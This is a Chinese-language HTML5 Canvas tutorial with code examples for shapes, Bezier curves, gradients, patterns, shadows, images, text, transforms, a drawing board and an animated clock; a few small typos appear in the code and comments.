    • 创建一个 Heart 对象,并注册了其 onHoveronLeave 事件,当鼠标悬停在心形图形上时,颜色变为蓝色;当鼠标离开时,颜色变回红色。

    • 创建一个 render 函数,使用 requestAnimationFrame 方法定期重新绘制心形图形,从而实现动画效果。

    var ctx = c1.getContext("2d");

    class Heart {
    constructor(x, y) {
    this.x = x;
    this.y = y;
    this.color = "red";
    this.isIn = false;
    this.eventMapList = {
    hover: [],
    leave: [],
    };

    c1.onmousemove = (e) => {
    let x = e.offsetX;
    let y = e.offsetY;
    this.isIn = ctx.isPointInPath(this.heartPath, x, y);
    if (this.isIn) {
    this.eventMapList.hover.forEach((item) => {
    item();
    });
    } else {
    this.eventMapList.leave.forEach((item) => {
    item();
    });
    }
    };
    }
    onHover(fn) {
    this.eventMapList.hover.push(fn);
    }
    onLeave(fn) {
    this.eventMapList.leave.push(fn);
    }
    setPosition(x, y) {
    this.x = x;
    this.y = y;
    }
    draw() {
    this.heartPath = new Path2D();
    // 起点
    this.heartPath.moveTo(this.x, this.y);
    // 2 个控制点、1 个终点
    this.heartPath.bezierCurveTo(
    this.x + 50,
    this.y - 50,
    this.x + 100,
    this.y,
    this.x,
    this.y + 50
    );
    this.heartPath.bezierCurveTo(
    this.x - 100,
    this.y,
    this.x - 50,
    this.y - 50,
    this.x,
    this.y
    );
    ctx.save();
    ctx.fillStyle = this.color;
    ctx.fill(this.heartPath);

    ctx.restore();
    }
    }
    let heart = new Heart(100, 100);
    heart.onHover(() => {
    heart.color = "blue";
    });
    heart.onLeave(() => {
    heart.color = "red";
    });
    function render() {
    ctx.clearRect(0, 0, c1.width, c1.height);
    heart.draw();
    requestAnimationFrame(render);
    }
    render();

    27-canvas 实现在线画板

    • 设置若干按钮:

      • boldBtn 粗画笔

        • 调整模式为画笔模式 source-over
        • 将画笔粗细设为 20
        • 设置按钮显示状态
        boldBtn.onclick = function () {
        ctx.globalCompositeOperation = 'source-over';
        ctx.lineWidth = 20;
        boldBtn.classList.add('active');
        thinBtn.classList.remove('active');
        clearBtn.classList.remove('active');
        }
      • thinBtn 细画笔

        • 调整模式为画笔模式 source-over

        • 将画笔粗细设为 1

        • 设置按钮显示状态

        thinBtn.onclick = function () {
        ctx.globalCompositeOperation = 'source-over';
        ctx.lineWidth = 1;
        thinBtn.classList.add('active');
        boldBtn.classList.remove('active');
        clearBtn.classList.remove('active');
        }
      • saveBtn 保存图像

        • 把当前画布下载并保存
        saveBtn.onclick = function () {
        var urlData = canvas.toDataURL();
        var downloadA = document.createElement('a');
        downloadA.setAttribute('download', '酷炫签名');
        downloadA.href = urlData;
        downloadA.click();
        }
      • color 调色

        • 设置画笔颜色
        inputColor.onchange = function () {
        ctx.strokeStyle = inputColor.value;
        }
      • clearBtn 橡皮擦

        • 调整模式为擦除模式 destination-out
        • 将画笔粗细设为 30
        • 设置按钮显示状态
        clearBtn.onclick = function () {
        ctx.globalCompositeOperation = 'destination-out';
        ctx.lineWidth = 30;
        clearBtn.classList.add('active');
        thinBtn.classList.remove('active');
        boldBtn.classList.remove('active');
        }
      • nullBtn 清空画布

        nullBtn.onclick = function () {
        ctx.clearRect(0, 0, 800, 600);
        }
    <canvas id="c" width="600" height="400">
    当前浏览器不支持 canvas,请下载最新的浏览器
    <a href="https://www.google.cn/intl/zh-CN/chrome/">立即下载</a>
    </canvas>
    <hr>
    <button id="boldBtn" type="button">粗线条</button>
    <button id="thinBtn" class="active" type="button">细线条</button>
    <button id="saveBtn" type="button">保存签名</button>
    <input type="color" name="" id="color" value="" />
    <button id="clearBtn">橡皮擦</button>
    <button id="nullBtn">清空画布</button>

    <script>
    // 1. 找到画布
    var canvas = document.getElementById("c");

    // 判断是否有 getContext
    if (!canvas.getContext) {
    console.log("当前浏览器不支持 canvas,请下载最新的浏览器");
    }
    // 2. 获取画笔,上下文对象
    var ctx = canvas.getContext("2d");

    var boldBtn = document.querySelector('#boldBtn');
    var thinBtn = document.querySelector('#thinBtn');
    var inputColor = document.querySelector('#color');
    // 保存签名
    var saveBtn = document.querySelector('#saveBtn');
    // 橡皮擦按钮
    var clearBtn = document.querySelector('#clearBtn');
    // 清空画布
    var nullBtn = document.querySelector('#nullBtn');
    // 设置允许绘制的变量
    var isDraw = false;

    canvas.onmousedown = function () {
    isDraw = true;
    ctx.beginPath();
    var x = event.pageX - canvas.offsetLeft;
    var y = event.pageY - canvas.offsetTop;
    ctx.moveTo(x, y);
    }

    canvas.onmouseleave = function () {
    isDraw = false;
    ctx.closePath();
    }

    canvas.onmouseup = function () {
    isDraw = false;
    ctx.closePath();
    }

    canvas.onmousemove = function () {
    if (isDraw) {
    var x = event.pageX - canvas.offsetLeft;
    var y = event.pageY - canvas.offsetTop;
    ctx.lineTo(x, y);
    ctx.stroke();
    }
    }

    boldBtn.onclick = function () {
    ctx.globalCompositeOperation = 'source-over';
    ctx.lineWidth = 20;
    boldBtn.classList.add('active');
    thinBtn.classList.remove('active');
    clearBtn.classList.remove('active');
    }

    thinBtn.onclick = function () {
    ctx.globalCompositeOperation = 'source-over';
    ctx.lineWidth = 1;
    thinBtn.classList.add('active');
    boldBtn.classList.remove('active');
    clearBtn.classList.remove('active');
    }

    clearBtn.onclick = function () {
    ctx.globalCompositeOperation = 'destination-out';
    ctx.lineWidth = 30;
    clearBtn.classList.add('active');
    thinBtn.classList.remove('active');
    boldBtn.classList.remove('active');
    }

    nullBtn.onclick = function () {
    ctx.clearRect(0, 0, 800, 600);
    }

    saveBtn.onclick = function () {
    var urlData = canvas.toDataURL();
    var downloadA = document.createElement('a');
    downloadA.setAttribute('download', '酷炫签名');
    downloadA.href = urlData;
    downloadA.click();
    }

    inputColor.onchange = function () {
    ctx.strokeStyle = inputColor.value;
    }
    </script>

    28-canvas 绘制动态时钟

    • var time = new Date(); 获取当前时间

    • render() 下每秒重绘:

      • 绘制表盘
        • 时针刻度
        • 分针刻度
      • 绘制指针
        • 时针
        • 分针
        • 秒针
    var c = document.querySelector("#c");
    var ctx = c.getContext("2d");

    function render() {
    ctx.clearRect(0, 0, 800, 600);
    // 存档,保存当前坐标位置和上下文对象的状态
    ctx.save();
    ctx.translate(400, 300);
    ctx.rotate(-Math.PI / 2);

    ctx.save();
    for (var i = 0; i < 12; i++) {
    // 绘制小时的刻度
    ctx.beginPath();
    ctx.moveTo(170, 0);
    ctx.lineTo(190, 0);
    ctx.lineWidth = 8;
    ctx.strokeStyle = "gray";
    ctx.stroke();
    ctx.closePath();
    ctx.rotate((2 * Math.PI) / 12);
    }

    ctx.restore();
    ctx.save();
    for (var i = 0; i < 60; i++) {
    // 绘制小时的刻度
    ctx.beginPath();
    ctx.moveTo(180, 0);
    ctx.lineTo(190, 0);
    ctx.lineWidth = 2;
    ctx.strokeStyle = "gray";
    ctx.stroke();
    ctx.closePath();
    ctx.rotate((2 * Math.PI) / 60);
    }
    ctx.restore();
    ctx.save();

    // 获取当前时间
    var time = new Date();
    var hour = time.getHours();
    var min = time.getMinutes();
    var sec = time.getSeconds();
    hour = hour >= 12 ? hour - 12 : hour;

    // 绘制秒针
    ctx.rotate(((2 * Math.PI) / 60) * sec);
    ctx.beginPath();
    ctx.moveTo(-30, 0);
    ctx.lineTo(190, 0);
    ctx.lineWidth = 2;
    ctx.strokeStyle = "red";
    ctx.stroke();
    ctx.closePath();
    ctx.restore();
    ctx.save();

    // 绘制分针
    ctx.rotate(
    ((2 * Math.PI) / 60) * min + ((2 * Math.PI) / 60 / 60) * sec
    );
    ctx.beginPath();
    ctx.moveTo(-20, 0);
    ctx.lineTo(130, 0);
    ctx.lineWidth = 4;
    ctx.strokeStyle = "#888";
    ctx.stroke();
    ctx.closePath();
    ctx.restore();
    ctx.save();

    // 绘制时钟
    ctx.rotate(
    ((2 * Math.PI) / 12) * hour +
    ((2 * Math.PI) / 12 / 60) * min +
    ((2 * Math.PI) / 12 / 60 / 60) * sec
    );
    ctx.beginPath();
    ctx.moveTo(-15, 0);
    ctx.lineTo(110, 0);
    ctx.lineWidth = 8;
    ctx.strokeStyle = "#333";
    ctx.stroke();
    ctx.closePath();
    ctx.restore();
    ctx.restore();
    requestAnimationFrame(render);
    }

    render();

    ​ 当前时间是:

    ]]>
    + 资源

    正文

    01-初识 Canvas

    • 创建一个 canvas:
    1
    <canvas id="c" width="600" height="400"></canvas>
    • 一个 canvas 画布一般包含三要素:

      • id: 标识元素的唯一性

      • width: 画布的宽度

      • height: 画布的高度

    • 在 Canvas 上画画:

      • 找到 ID 为 c 的画布:
    1
    var c = document.getElementById('c')
    • 获取画笔,上下文对象:
    1
    var ctx = c1.getContext('2d');
    • 绘制矩形:fillRect (位置 x, 位置 y, 宽度, 高度)
    1
    ctx.fillRect(100, 100, 100, 100);

    • 完整代码:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    </head>
    <body>
    <!--
    id: 标识元素的唯一性
    width: 画布的宽度
    height: 画布的高度
    -->
    <canvas id="c" width="600" height="400"></canvas>
    <script>
    // 1. 找到画布
    var c = document.getElementById('c')
    // 2. 获取画笔,上下文对象
    var ctx = c1.getContext('2d');
    // 3. 绘制图形
    // 3.1 绘制矩形 fillRect(位置 x, 位置 y, 宽度, 高度)
    ctx.fillRect(100, 100, 100, 100);
    </script>
    </body>
    </html>
    • 最终效果:

    png

    02-canvas上下文对象与浏览器支持

    • 对于不适应 canvas 的浏览器,c.getContext 将会返回空,可以输出提示信息:
    1
    2
    3
    4
    5
    // 判断是否有 getContext
    if(!c.getContext)
    {
    console.log("当前浏览器不支持 canvas,请下载最新的浏览器");
    }
    • 如果不适应 canvas,canvas 里的内容就不会被覆盖,就可以操作一番:
    1
    2
    3
    4
    <canvas id="c" width="600" height="400">
    当前浏览器不支持 canvas,请下载最新的浏览器
    <a href="https://www.google.cn/chrome/index.html">立即下载</a>
    </canvas>
    • 画笔有很多属性,console.log(ctx); 输出它们:

    png


    • 完整代码:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    <!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    </head>
    <body>
    <!--
    id: 标识元素的唯一性
    width: 画布的宽度
    height: 画布的高度
    -->
    <canvas id="c" width="600" height="400">
    当前浏览器不支持 canvas,请下载最新的浏览器
    <a href="https://www.google.cn/chrome/index.html">立即下载</a>
    </canvas>
    <script>
    // 1. 找到画布
    var c = document.getElementById('c')
    // 判断是否有 getContext
    if(!c.getContext)
    {
    console.log("当前浏览器不支持 canvas,请下载最新的浏览器");
    }
    // 2. 获取画笔,上下文对象
    var ctx = c1.getContext('2d');
    console.log(ctx);
    // 3. 绘制图形
    // 3.1 绘制矩形 fillRect(位置 x, 位置 y, 宽度, 高度)
    ctx.fillRect(100, 100, 100, 100);
    </script>
    </body>
    </html>

    03-Canvas 填充与路径绘制

    • 在 canvas 中,如果 style 属性设置了大小,则这个画布在网页上的最终显示将会进行拉伸变换。(但是一般是设置相同的)
    1
    <canvas id="c" width="600" height="400" style="width: 200px; height: 200px;"></canvas>

    png


    • 之前使用 ctx.fillRect() 会生成自带填充的矩形,而使用 ctx.strokeRect() 则会以路径形式绘制矩形。
      • strokeRect(x1, y1, 矩形宽度,矩形高度)
        • x1 为矩形左上角的点到画布左上角 x 轴的距离
        • y1 为矩形左上角的点到画布左上角 y 轴的距离
    1
    2
    3
    // 3. 绘制图形
    // 3.2 路径绘制矩形 strokeRect(x1, y1, 矩形宽度,矩形高度)
    ctx.strokeRect(100, 200, 200, 100);

    png


    • 清除画布范围内的矩形:
    1
    ctx.clearRect(0, 0, c1.clientWidth, c1.clientHeight);

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    ctx.strokeRect(100, 200, 200, 100);
    ctx.fillRect(200, 150, 200, 100);
    let height = 0;
    let t1 = setInterval(() => {
    height++;
    ctx.clearRect(0, 0, c1.clientWidth, height);
    if (height > c1.clientHeight)
    {
    clearInterval(t1);
    }
    }, 10);

    • 定义矩形,但不绘制:
    1
    ctx.rect(100, 200, 300, 300);
    • 填充所定义的矩形:
    1
    ctx.fill();
    • 描边所定义的矩形:
    1
    ctx.stroke();

    • ctx.beginPath();ctx.closePath(); 分别表示提笔和抬笔操作,这样绘制的时候不会覆盖之前定义的图形。(有种 Windows 程序设计的味道)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    ctx.beginPath();
    ctx.rect(200, 150, 200, 100);
    ctx.stroke();
    ctx.closePath();

    ctx.beginPath();
    ctx.rect(100, 200, 200, 100);
    ctx.fill();
    ctx.closePath();

    04-canvas绘制圆弧与笑脸

    • arc 是绘制圆弧的方法。
    • ctx.arc(圆心x, 圆心y, 半径, 开始的角度, 结束的角度, 逆时针(true)还是顺时针(false));
    1
    2
    ctx.arc(300, 200, 50, 0, Math.PI / 4);
    ctx.stroke();
    • 使用圆弧工具绘制一个笑脸,记得要分别使用 ctx.beginPath();ctx.closePath(); 提笔和抬笔,不然路径会相连。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    // 绘制一张脸
    ctx.beginPath();
    ctx.arc(75, 75, 50, 0, Math.PI * 2);
    ctx.stroke();
    ctx.closePath();
    // 绘制嘴巴
    ctx.beginPath();
    ctx.arc(75, 75, 35, 0, Math.PI);
    ctx.stroke();
    ctx.closePath();
    // 绘制嘴巴
    ctx.beginPath();
    ctx.arc(60, 65, 5, 0, Math.PI * 2);
    ctx.stroke();
    ctx.closePath();
    // 绘制右眼
    ctx.beginPath();
    ctx.arc(90, 65, 5, 0, Math.PI * 2);
    ctx.stroke();
    ctx.closePath();

    • 上述方法代码太繁琐,改用 moveTo 来移动点。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    ctx.beginPath();
    // 绘制一张脸
    ctx.arc(75, 75, 50, 0, Math.PI * 2);
    ctx.moveTo(110, 75);
    // 绘制嘴巴
    ctx.arc(75, 75, 35, 0, Math.PI);
    ctx.moveTo(65, 65);
    // 绘制嘴巴
    ctx.arc(60, 65, 5, 0, Math.PI * 2);
    ctx.moveTo(95, 65);
    // 绘制右眼
    ctx.arc(90, 65, 5, 0, Math.PI * 2);
    ctx.stroke();
    ctx.closePath();

    • 最终效果:

    05-绘制折线线段

    1
    2
    ctx.moveTo(300, 200);
    ctx.lineTo(350, 250);
    • 将画笔移动到 (300, 200),然后划线至 (350, 250)

    • 范例:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    ctx.beginPath();
    ctx.moveTo(300, 200);
    ctx.lineTo(350, 250);
    ctx.lineTo(350, 200);
    ctx.lineTo(300, 200);
    ctx.stroke();
    ctx.closePath();

    ctx.beginPath();
    ctx.moveTo(200, 100);
    ctx.lineTo(250, 150);
    ctx.lineTo(250, 100);
    ctx.lineTo(200, 100);
    ctx.fill();
    ctx.closePath();
    • 最终效果:

    06-actTo 绘制圆弧方式

    • actTo,用 3 个点控制一段圆弧。

    png

    1
    2
    3
    4
    5
    6
    7
    ctx.beginPath();
    // 第 1 个点
    ctx.moveTo(300, 200);
    // 第 2 个点和第 3 个点,以及圆弧的半径
    ctx.arcTo(300, 250, 250, 250, 50);
    ctx.stroke();
    ctx.closePath();

    png

    07-二次贝塞尔曲线实现聊天气泡框


    png

    • 开始点:moveTo(20,20)
    • 控制点:quadraticCurveTo(20,100,200,20)
    • 结束点:quadraticCurveTo(20,100,200,20)

    • 使用二次贝塞尔曲线画一个聊天气泡框:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    ctx.beginPath();
    ctx.moveTo(200, 300);
    ctx.quadraticCurveTo(150, 300, 150, 200);
    ctx.quadraticCurveTo(150, 100, 300, 100);
    ctx.quadraticCurveTo(450, 100, 450, 200);
    ctx.quadraticCurveTo(450, 300, 250, 300);
    ctx.quadraticCurveTo(250, 350, 150, 350);
    ctx.quadraticCurveTo(200, 350, 200, 300);
    ctx.stroke();
    ctx.closePath();

    png

    08-三次贝塞尔曲线实现献给朋友的爱心


    • 代码:
    1
    2
    3
    4
    5
    6
    ctx.beginPath();
    ctx.moveTo(300, 200);
    ctx.bezierCurveTo(350, 150, 400, 200, 300, 250);
    ctx.bezierCurveTo(200, 200, 250, 150, 300, 200);
    ctx.stroke();
    ctx.closePath();

    png

    09-封装路径Path2d

    • 将之前所画的心形封装成一个路径:
    1
    2
    3
    4
    5
    var heartPath = new Path2D();
    heartPath.moveTo(300, 200);
    heartPath.bezierCurveTo(350, 150, 400, 200, 300, 250);
    heartPath.bezierCurveTo(200, 200, 250, 150, 300, 200);
    ctx.stroke(heartPath);
    • 或是使用 svg 字符串创建一个路径:
    1
    2
    var polyline = new Path2D("M10 10 h 80 v 80 h -80 z");
    ctx.stroke(polyline);
    • 最终效果:

    10-颜色样式控制

    • ctx.strokeStyle = ""ctx.fillStyle = "" 分别设置描边和填充样式。
      • ”red“ 预设颜色。
      • "#ff00ff" 16 进制颜色。
      • rgb(255, 0, 0) RGB 颜色。
      • rgba(200, 200, 255) RGBA 颜色。
    • ctx.globalAlpha = 0.5; 设置全局透明度。

    • 演示效果:

    11-线型渐变和径向渐变


    • 线性渐变:
    1
    2
    3
    4
    5
    6
    let lineGradient = ctx.createLinearGradient(100, 200, 400, 500);
    lineGradient.addColorStop(0, "red");
    lineGradient.addColorStop(0.3, "#ffcccc");
    lineGradient.addColorStop(1, "blue");
    ctx.fillStyle = lineGradient;
    ctx.fillRect(100, 200, 300, 300);

    png


    • 线性渐变动画:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    let index = 0;

    function render()
    {
    ctx.clearRect(0, 0, 600, 400);
    index += 0.01;
    if (index > 1)
    {
    index = 0;
    }
    let linearGradient = ctx.createLinearGradient(100, 200, 400, 500);
    linearGradient.addColorStop(0, "red");
    linearGradient.addColorStop(index, "#ffcccc");
    linearGradient.addColorStop(1, "blue");
    ctx.fillStyle = linearGradient;
    ctx.fillRect(100, 200, 300, 300);
    requestAnimationFrame(render);
    }

    requestAnimationFrame(render);

    1
    2
    3
    4
    5
    6
    7
    let radiaGradient = ctx.createRadialGradient(300, 200, 0, 300, 200, 100);
    radiaGradient.addColorStop(0, "red");
    radiaGradient.addColorStop(0.3, "#ffcccc");
    radiaGradient.addColorStop(1, "blue");
    ctx.fillStyle = radiaGradient;

    ctx.fillRect(0, 0, 600, 400);

    png


    • 径向渐变画个球:
    1
    2
    3
    4
    5
    6
    7
    let radiaGradient = ctx.createRadialGradient(250, 150, 10, 300, 200, 100);
    radiaGradient.addColorStop(0, "#ffcccc");
    radiaGradient.addColorStop(1, "red");
    ctx.fillStyle = radiaGradient;

    ctx.arc(300, 200, 100, 0, Math.PI * 2);
    ctx.fill();

    png

    12-圆锥渐变特效

    1
    2
    3
    4
    5
    6
    7
    // 圆锥渐变 createConicGradient(角度, 位置 x, 位置 y)
    let coneGradient = ctx.createConicGradient(Math.PI / 4, 300, 200);
    coneGradient.addColorStop(0, "red");
    coneGradient.addColorStop(0.5, "yellow");
    coneGradient.addColorStop(1, "blue");
    ctx.fillStyle = coneGradient;
    ctx.fillRect(0, 0, 600, 400);

    13-pattern 印章填充样式

    • createPattern(图片对象,重复方式);
      • 图片对象(可以是 image 对象,也可以是 canvas 对象)
      • 重复方式 repeat, no-repeat, repeat-x, repeat-y
    1
    2
    3
    4
    5
    6
    7
    8
    9
    var img = new Image();
    img.src = "./imgs/money.png"

    img.onload = function(){
    // 创建图案对象 createPattern(图片对象,重复方式)
    var pattern = ctx.createPattern(img, "repeat");
    ctx.fillStyle = pattern;
    ctx.fillRect(0, 0, 600, 400);
    }

    14-线段和虚线样式设置

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    var c = document.getElementById('c')
    var ctx = c.getContext('2d');

    ctx.moveTo(200, 150);
    ctx.lineTo(300, 200);
    ctx.lineTo(400, 150);
    // 设置线条样式,默认 1px
    ctx.lineWidth = 40;
    // 设置线条端点样式,butt 平齐,round 半圆,正方形: square
    ctx.lineCap = "square";
    // 设置 2 个线段连接处的样式,mitter 外侧相连的角,round 角被磨圆了。
    ctx.lineJoin = "round";
    ctx.stroke();

    png


    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    var c = document.getElementById('c')
    var ctx = c.getContext('2d');

    ctx.moveTo(290, 150);
    ctx.lineTo(300, 200);
    ctx.lineTo(310, 150);
    // 设置线条样式,默认 1px
    ctx.lineWidth = 40;
    // 设置线条端点样式,butt 平齐,round 半圆,正方形: square
    ctx.lineCap = "square";
    // 设置 2 个线段连接处的样式,mitter 外侧相连的角,round 角被磨圆了。
    ctx.lineJoin = "mitter";
    // 对斜截面进行限制
    ctx.miterLimit = 5;
    ctx.stroke();

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    var c = document.getElementById('c')
    var ctx = c.getContext('2d');

    ctx.moveTo(150, 150);
    ctx.lineTo(300, 200);
    ctx.lineTo(450, 150);
    // 设置线条样式,默认 1px
    ctx.lineWidth = 2;
    // 设置线条端点样式,butt 平齐,round 半圆,正方形: square
    ctx.lineCap = "square";
    // 设置 2 个线段连接处的样式,mitter 外侧相连的角,round 角被磨圆了。
    ctx.lineJoin = "mitter";
    // 对斜截面进行限制
    ctx.miterLimit = 5;
    // 设置虚线
    ctx.setLineDash([40, 20]);
    ctx.lineDashOffset = 10;
    ctx.stroke();
    • ctx.setLineDash([40, 20]) 方法会设置线条的虚线样式,其中数组中的数字表示虚线和实线的长度(单位为像素)。在本例中,[40, 20] 表示先绘制长度为 40 的实线,再跳过长度为 20 的空白,然后重复这个过程。因此,这段代码将绘制一个由实线和空白组成的虚线。

    • ctx.lineDashOffset = 10 则是设置虚线的偏移量。这个属性可以改变虚线起始点的位置。

    png


    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    var c = document.getElementById('c')
    var ctx = c.getContext('2d');
    let index = 0;

    function render(){
    ctx.clearRect(0, 0, 600, 400);
    index++;
    if (index > 40) {
    index = 0;
    }
    ctx.moveTo(150, 150);
    ctx.lineTo(300, 200);
    ctx.lineTo(450, 150);
    // 设置线条样式,默认 1px
    ctx.lineWidth = 2;
    // 设置线条端点样式,butt 平齐,round 半圆,正方形: square
    ctx.lineCap = "square";
    // 设置 2 个线段连接处的样式,mitter 外侧相连的角,round 角被磨圆了。
    ctx.lineJoin = "mitter";
    // 对斜截面进行限制
    ctx.miterLimit = 5;
    // 设置虚线
    ctx.setLineDash([40, 20]);
    ctx.lineDashOffset = index;
    ctx.stroke();
    requestAnimationFrame(render);
    }
    render();

    15-canvas 阴影设置

    • 核心代码:
    1
    2
    3
    4
    5
    // 设置阴影
    ctx.shadowOffsetX = 10;
    ctx.shadowOffsetY = 10;
    ctx.shadowBlur = 5;
    ctx.shadowColor = "rgba(255, 100, 100, 1)";
    • 完整代码:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度

    // 设置阴影
    ctx.shadowOffsetX = 10;
    ctx.shadowOffsetY = 10;
    ctx.shadowBlur = 5;
    ctx.shadowColor = "rgba(255, 100, 100, 1)";

    ctx.globalAlpha = 0.5;
    // 起点
    var heartPath = new Path2D();
    heartPath.moveTo(300, 200);// 2个控制点、1个终点
    heartPath.bezierCurveTo(350, 150, 400, 200, 300, 250);
    heartPath.bezierCurveTo(200, 200, 250, 150, 300, 200);
    ctx.strokeStyle = "red"
    ctx.stroke(heartPath);

    var chatPath = new Path2D();
    chatPath.moveTo(200, 300);
    chatPath.quadraticCurveTo(150, 300, 150, 200);
    chatPath.quadraticCurveTo(150, 100, 300, 100);
    chatPath.quadraticCurveTo(450, 100, 450, 200);
    chatPath.quadraticCurveTo(450, 300, 250, 300);
    chatPath.quadraticCurveTo(250, 350, 150, 350);
    chatPath.quadraticCurveTo(200, 350, 200, 300);
    ctx.strokeStyle = "#ff00ff";

    ctx.stroke(chatPath);
    ctx.fillStyle = "rgba(255,200,200,0.3)";
    ctx.fill(heartPath);
    // 创建一条折线
    var polyline = new Path2D("M10 10 h 80 v 80 h -80 z");
    ctx.strokeStyle = "rgba(0,0,255)";

    ctx.stroke(polyline);

    png

    16-canvas 绘制图片的三种模式

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度

    // 获取图片
    let img = new Image();
    img.src = "./imgs/girl.webp";
    img.onload = function (){
    // 第一种方式绘制,(图片对象,水平位置,垂直位置)
    // ctx.drawImage(img, 0, 0);
    // 第二种方式绘制,能够缩放图片(图片对象,水平位置,垂直位置,缩放到对应宽度,缩放到对应高度)
    ctx.drawImage(img, 0, 0, 600, 400);
    // 第三种方式绘制,能够裁剪图片,img 参数后面的四个参数分别为源图片上面你要裁剪的起点位置和矩形的宽高,后面四个参数分别为画布的位置和要渲染的矩形的宽高
    ctx.drawImage(img, 640, 0, 1280, 720, 0, 0, 600, 400);
    }

    17-canvas 绘制动态视频并添加水印

    1
    <video src="./imgs/mov_bbb.mp4" controls></video>
    • <video> 组件可以在网页中显示视频。

    可以把视频里的帧放入 canvas 中,还可以在视频上叠加水印。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    </head>
    <body>
    <canvas id="c" width="600" height="400"></canvas>
    <video style="display: none;" src="./imgs/mov_bbb.mp4" controls></video>
    <button id="btn">播放 / 暂停</button>
    <script>
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度

    // 获取视频对象
    var video = document.querySelector("video");

    // 获取按钮
    let btn = document.querySelector("#btn");
    btn.onclick = function(){
    video.play();
    render();
    }

    // logo 图片对象
    let img = new Image();
    img.src = "./imgs/logo.png";

    function render(){
    ctx.drawImage(video, 0, 0, 600, 400);
    ctx.drawImage(img, 400, 350, 200, 50);
    requestAnimationFrame(render);
    }
    </script>
    </body>

    18-文字绘制与对齐

    • 绘制文字颜色
    1
    ctx.strokeStyle = "#f00";
    • 设置文字大小与字体
    1
    ctx.font = "100px Microsoft YaHei";
    • 填充渲染文字
      • fillText(文本, 文本的起点 x 坐标, 文本的起点 y 坐标, 绘制文字的最大宽度)
    1
    ctx.fillText("你好", 300, 200);
    • 文本对齐选项 textAlign, start(默认), end, left, right, center
    1
    ctx.textAlign = "center";
    • 文本基线对齐,textBaseline, top, bottom, alphabetic
    1
    ctx.textBaseline = "middle";
    • 文本的方向
    1
    ctx.direction = "rtl";
    • 预测量文本宽度
    1
    2
    let text = ctx.measureText("你好!");
    console.log(text);
    • 绘制文本边框
    1
    ctx.strokeText("你好!", 300, 200);
    • 完整代码
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度
    // 文字,大小 / 字体
    ctx.strokeStyle = "#f00";
    ctx.font = "100px Microsoft YaHei";
    // 填充渲染文字
    // fillText(文本, 文本的起点 x 坐标, 文本的起点 y 坐标, 绘制文字的最大宽度)
    // ctx.fillText("你好", 300, 200);
    // 文本对齐选项 textAlign, start(默认), end, left, right, center
    ctx.textAlign = "center";
    // 文本基线对齐,textBaseline, top, bottom, alphabetic
    ctx.textBaseline = "middle";
    // 文本的方向
    ctx.direction = "rtl";
    // 预测量文本宽度
    let text = ctx.measureText("你好!");
    console.log(text);
    ctx.strokeText("你好!", 300, 200);
    ctx.arc(300, 200, 5, 0, 2 * Math.PI);
    ctx.fill();

    png

    19-位移_缩放_旋转变换

    • ctx.translate(100, 100);
      • 让坐标系原点向左和向下移动 100px。
    • ctx.rotate(Math.PI / 6);
      • 逆时针旋转坐标系 30°
    • ctx.scale(5, 2);
      • 让坐标系分别沿 x 轴和 y 轴缩放 5 倍和 2 倍。

    • 完整代码:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    // 1. 找到画布
    var c = document.getElementById('c');
    // 2. 获取画笔,上下文对象
    var ctx = c.getContext('2d');// 设置全局的透明度
    // 3. 绘制图形
    // 3.1 绘制图形 fillRect(位置 x, 位置 y, 宽度, 高度)
    ctx.translate(100, 100);
    // scale 拉伸坐标系
    ctx.rotate(Math.PI / 6);
    ctx.scale(5, 2);
    ctx.fillRect(0, 0, 50, 50);
    ctx.translate(100, 100);
    ctx.fillRect(0, 0, 50, 50);

    png

